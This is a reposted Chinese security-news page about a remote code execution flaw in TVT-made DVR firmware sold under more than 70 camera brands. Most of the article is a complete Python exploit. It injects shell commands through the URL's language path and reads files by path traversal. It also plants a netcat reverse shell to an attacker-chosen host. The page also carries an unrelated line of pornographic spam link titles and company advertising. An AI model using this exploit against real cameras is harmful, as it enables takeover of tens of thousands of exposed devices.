日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
黑掉70多款監(jiān)控攝像頭?soeasy!

近日,一位安全研究員發(fā)現(xiàn)70多個供應(yīng)商售賣的監(jiān)控攝像頭很容易受到遠程代碼執(zhí)行(RCE)攻擊。

成都創(chuàng)新互聯(lián)公司是一家集網(wǎng)站建設(shè),威遠企業(yè)網(wǎng)站建設(shè),威遠品牌網(wǎng)站建設(shè),網(wǎng)站定制,威遠網(wǎng)站建設(shè)報價,網(wǎng)絡(luò)營銷,網(wǎng)絡(luò)優(yōu)化,威遠網(wǎng)站推廣為一體的創(chuàng)新建站企業(yè),幫助傳統(tǒng)企業(yè)提升企業(yè)形象加強企業(yè)競爭力。可充分滿足這一群體相比中小企業(yè)更為豐富、高端、多元的互聯(lián)網(wǎng)需求。同時我們時刻保持專業(yè)、時尚、前沿,時刻以成就客戶成長自我,堅持不斷學(xué)習(xí)、思考、沉淀、凈化自己,讓我們?yōu)楦嗟钠髽I(yè)打造出實用型網(wǎng)站。

根據(jù)安全研究員Rotem Kemer研究發(fā)現(xiàn),超過70個供應(yīng)商售賣的監(jiān)控攝像頭都很容喲受到遠程代碼執(zhí)行(RCE)攻擊。

研究人員注意到供應(yīng)商正在售賣的商品使用的是同樣的、易受到RCE攻擊的固件。

在“白色標(biāo)簽”的經(jīng)營模式下,各種各樣的供應(yīng)商只是簡單地將自己的標(biāo)簽貼在相同的產(chǎn)品上進行售賣,但是不幸的是,他們都沒有開發(fā)軟件硬件的資格。

這個脆弱的固件是由一家中國制造商TVT開發(fā)的,Kerner分析之后發(fā)現(xiàn)了閉路電視系統(tǒng)的DVR盒易于攻擊的原因。

使用這種固件的產(chǎn)品是在一家銷售閉路電視系統(tǒng)的以色列公司購買的,其代碼也表明了這是一個脆弱的HTTP服務(wù)器。

安全漏洞依賴于服務(wù)器來檢查是否存在給定語言的目錄。如果該文件夾不存在,軟件會通過提取遠程命令來執(zhí)行打開口令。

下面是研究人員的解釋:

它會讀取URL,如果URL包含以下的內(nèi)容/language/[language]/index.html 。

如果該目錄存在的話,就會提取斜杠之間的【language】內(nèi)容并且進行檢查;如果不存在,就會直接執(zhí)行此命令

tar –zxf /mnt/mtd/WebSites/language.tar.gz [language]/* -C /nfsdir/language

這基本上就是給了我們一個遠程命令執(zhí)行的機會。

下面是影響固件漏洞的概念證明代碼:

 
 
 
    
  
  
  
  1. #!/usr/bin/python  
    2.   
  
  
  2. # http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html  
    3.   
  
  
  3. __author__ = 'Rotem Kerner' 
    4.   
  
  
  4. from sys import argv  
    5.   
  
  
  5. import optparse  
    6.   
  
  
  6. from urlparse import urlparse  
    7.   
  
  
  7. from re import compile  
    8.   
  
  
  8. import socket  
    9.   
  
  
  9. import requests  
    10.   
  
  
  10. from requests.exceptions import ConnectionError, Timeout, ContentDecodingError  
    11.   
  
  
  11. from socket import timeout  
    12.   
  
  
  12. def main():  
    13.   
  
  
  13.     # parse command line options and atguments  
    14.   
  
  
  14.     optparseoptparser = optparse.OptionParser(usage="%s  [options]" % argv[0])  
    15.   
  
  
  15.     optparser.add_option('-c','--check',action="store_true",dest="checkvuln", default=False,  
    16.   
  
  
  16.                          help="Check if target is vulnerable")  
    17.   
  
  
  17.     optparser.add_option('-e','--exploit', action="store", type="string", dest="connback",  
    18.   
  
  
  18.                          help="Fire the exploit against the given target URL")  
    19.   
  
  
  19.     (options, args) = optparser.parse_args()  
    20.   
  
  
  20.     try:  
    21.   
  
  
  21.         target = args[0]  
    22.   
  
  
  22.     except IndexError:  
    23.   
  
  
  23.         optparser.print_help()  
    24.   
  
  
  24.         exit()  
    25.   
  
  
  25.     target_url = urlparse(target)  
    26.   
  
  
  26.     # validating hostname  
    27.   
  
  
  27.     if not target_url.hostname:  
    28.   
  
  
  28.         print "[X] supplied target "%s" is not a valid URL" % target  
    29.   
  
  
  29.         optparser.print_help()  
    30.   
  
  
  30.         exit()  
    31.   
  
  
  31.     # A little hack to handle read timeouts, since urllib2 doesnt give us this functionality.  
    32.   
  
  
  32.     socket.setdefaulttimeout(10)  
    33.   
  
  
  33.     # is -c flag on check if target url is vulnrable.  
    34.   
  
  
  34.     if options.checkvuln is True:  
    35.   
  
  
  35.         print "[!] Checking if target "%s" is vulnable..." % target_url.netloc  
    36.   
  
  
  36.         try:  
    37.   
  
  
  37.             # Write file  
    38.   
  
  
  38.             raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}1>test&&tar${IFS}/string.js'  
    39.   
  
  
  39.                          % (target_url.scheme, target_url.netloc))  
    40.   
  
  
  40.             # Read the file.  
    41.   
  
  
  41.             response = raw_url_request('%s:/%s/../../../../../../../mnt/mtd/test' % (target_url.scheme, target_url.netloc))  
    42.   
  
  
  42.             # remove it..  
    43.   
  
  
  43.             raw_url_request('%s://%s/language/Swedish${IFS}&&rm${IFS}test&&tar${IFS}/string.js'  
    44.   
  
  
  44.                          % (target_url.scheme, target_url.netloc))  
    45.   
  
  
  45.         except (ConnectionError, Timeout, timeout) as e:  
    46.   
  
  
  46.             print "[X] Unable to connect. reason: %s.  exiting..." % e.message  
    47.   
  
  
  47.             return  
    48.   
  
  
  48.         if response.text[0] != '1':   
    49.   
  
  
  49.             print "[X] Expected response content first char to be '1' got %s. exiting..." % response.text  
    50.   
  
  
  50.             return  
    51.   
  
  
  51.         print "[V] Target "%s" is vulnerable!" % target_url.netloc  
    52.   
  
  
  52.     # if -e is on then fire exploit,  
    53.   
  
  
  53.     if options.connback is not None:  
    54.   
  
  
  54.         # Validate connect-back information.  
    55.   
  
  
  55.         pattern = compile('(?P[a-zA-Z0-9.-]+):(?P[0-9]+)')  
    56.   
  
  
  56.         match = pattern.search(options.connback)  
    57.   
  
  
  57.         if not match:  
    58.   
  
  
  58.             print "[X] given connect back "%s" should be in the format for host:port" % options.connback  
    59.   
  
  
  59.             optparser.print_help()  
    60.   
  
  
  60.             exit()  
    61.   
  
  
  61.         # fire remote code execution!  
    62.   
  
  
  62.         # Three ..  
    63.   
  
  
  63.         try:  
    64.   
  
  
  64.             raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}nc${IFS}%s${IFS}%s${IFS}>e&&${IFS}/a'  
    65.   
  
  
  65.                         % (target_url.scheme, target_url.netloc, match.group('host'), match.group('port')))  
    66.   
  
  
  66.         # Two ...  
    67.   
  
  
  67.             raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}"-e${IFS}$SHELL${IFS}">>e&&${IFS}/a'  
    68.   
  
  
  68.                          % (target_url.scheme, target_url.netloc))  
    69.   
  
  
  69.         # One. Left off!  
    70.   
  
  
  70.             raw_url_request('%s://%s/language/Swedish&&$(cat${IFS}e)${IFS}&>r&&${IFS}/s'  
    71.   
  
  
  71.                          % (target_url.scheme, target_url.netloc))  
    72.   
  
  
  72.         except (ConnectionError, Timeout, timeout) as e:  
    73.   
  
  
  73.             print "[X] Unable to connect reason: %s.  exiting..." % e.message  
    74.   
  
  
  74.         print "[V] Exploit payload sent!, if nothing went wrong we should be getting a reversed remote shell at %s:%s"   
    75.   
  
  
  75.               % (match.group('host'), match.group('port'))  
    76.   
  
  
  76. # Disabling URL encode hack  
    77.   
  
  
  77. def raw_url_request(url):  
    78.   
  
  
  78.     r = requests.Request('GET')  
    79.   
  
  
  79.     r.url = url  
    80.   
  
  
  80.     rr = r.prepare()  
    81.   
  
  
  81.     # set url without encoding  
    82.   
  
  
  82.     r.url = url  
    83.   
  
  
  83.     s = requests.Session()  
    84.   
  
  
  84.     return s.send(r)  
    85.   
  
  
  85. if __name__ == '__main__':  
    86.   
  
  
  86.     main() 
    87.

他注意到目前來說有數(shù)以萬計的產(chǎn)品在使用這種HTTP服務(wù)器。他是在查詢了Shodan搜索引擎之后做出的這樣的肯定判斷,而沒在這種搜索引擎中的產(chǎn)品可能數(shù)量更多。

研究者說,“快速查詢Shodan之后發(fā)現(xiàn)其分布超過三萬;這已經(jīng)很多了,但是我相信這還只是一小部分。”

Kerner試圖向最初的制造商TVT報告這個問題,但是沒有受到任何回復(fù)。


網(wǎng)頁題目:黑掉70多款監(jiān)控攝像頭?soeasy!
轉(zhuǎn)載來源:http://www.dlmjj.cn/article/cdjgsej.html